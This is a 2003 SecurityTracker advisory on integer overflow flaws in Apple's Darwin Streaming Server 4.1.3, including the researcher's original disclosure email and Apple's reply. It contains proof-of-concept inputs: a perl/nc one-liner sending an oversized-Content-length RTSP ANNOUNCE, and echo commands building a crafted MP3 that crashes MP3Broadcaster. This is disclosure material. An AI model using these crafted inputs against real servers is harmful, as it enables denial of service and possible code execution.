Apple Darwin Streaming Server Integer Processing Flaws May Let Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1006822
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jun 25 2003
|
Original Entry Date: May 23 2003
|
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via network
|
Advisory: Mordred Security Labs
|
Version(s): 4.1.3
|
Description: Several vulnerabilities were reported in the Apple QuickTime Darwin Streaming Server. A remote user may be able to execute arbitrary code on the server.
Sir Mordred (mordred@s-mail.com) reported some integer manipulation flaws in the QTSSReflector module and the MP3Broadcaster utility.
It
is reported that the ANNOUNCE request parsing code contains an integer overflow. A remote user can send a specially crafted ANNOUNCE
packet to trigger the flaw. It may be possible to execute arbitrary code.
A demonstration exploit transcript is provided:
$
perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1]
554 (rtsp) open
too many output retries : Broken pipe
It is also reported that the MP3Broadcaster utility does not properly
parse ID3 tags in MP3 files. A remote user can create a specially crafted MP3 file that, when checked using the utility, may be
able to execute arbitrary code.
Some demonstration exploit steps are provided in the Source Message.
The vendor has reportedly
been notified.
|
Impact: A remote user may be able to execute arbitrary code on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: developer.apple.com/darwin/projects/streaming/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Underlying OS Comments: Tested on Red Hat 7.2
|
Reported By: Sir Mordred <mordred@s-mail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 22 May 2003 19:11:05 +0000
From: Sir Mordred <mordred@s-mail.com>
Subject: QuickTime/Darwin Streaming Server security issues
|
// @(#)Security advisory: QuickTime/Darwin Streaming server security issues
Release date: May 22, 2003
Name: QuickTime/Darwin Streaming server security issues
Author: Sir Mordred (mordred@s-mail.com)
I. DESCRIPTION
Darwin Streaming Server (DSS) is server technology which allows
you to send streaming QuickTime data to clients across the Internet using
the industry standard RTP and RTSP protocols.
It is based on the same code as Apple's QuickTime Streaming Server.
Please visit http://developer.apple.com/darwin/projects/streaming/ for more
information about DSS.
II. DETAILS
* ISSUE 1 - Integer overflow in QTSSReflector module
Integer overflow exists in ANNOUNCE request parsing routine:
$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1] 554 (rtsp) open
too many output retries : Broken pipe
* ISSUE 2 - Integer handling vulnerability in MP3Broadcaster utility
MP3Broadcaster utility which is shipped with DSS, suffers from integer
handling vulnerability in ID3 tags parsing routines.
Below are the steps how to reproduce the issue:
First create the sample configuration file:
$ echo -e "\n" > test.conf
Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply
Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00
" > song.mp3
Now, when the user tries to check his mp3 files (-X option):
$ MP3Broadcaster -X -l mp3playlist.ply -c test.conf
Configuration Settings
--------------------------
...
play_mode sequential
playlist_file mp3playlist.ply
...
There is one movie in the Playlist.
Segmentation fault (core dumped)
III. VERSIONS TESTED
Linux RedHat 7.2 with DSS 4.1.3
$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc localhost 554
RTSP/1.0 200 OK
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq: 1
Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE,
SET_PARAMETER,RECORD
IV. VENDOR STATUS
The emails have been sent to product-security@apple.com,
streaming-server-developers@lists.apple.com and after a bit of waiting got
rather interesting answer from Joel Hedden <jhedden@apple.com>:
<quote>
Please correct us if this is wrong:
1. The bugs are only DoS attacks and cannot be used to breach security of
the host machine, run arbitrary code, etc.
2. Neither bug is remotely exploitable unless the administrator has
enabled
unauthenticated remote broadcasts (which is not likely).
</quote>
I think both of the "bugs" can be used to "breach security of the host
machine, run arbitrary code, etc"...
After receiving response from Apple just decided to publish the advisory a
bit earlier then i planned.
V. CREDITS
Credits go to:
Sir Mordred <mordred@s-mail.com> who discovered the issues.
________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com
[Editor's note: This message has been edited to remove one line in the
"CREDITS" section containing personal comments. No technical information
has been modified.]
|
|
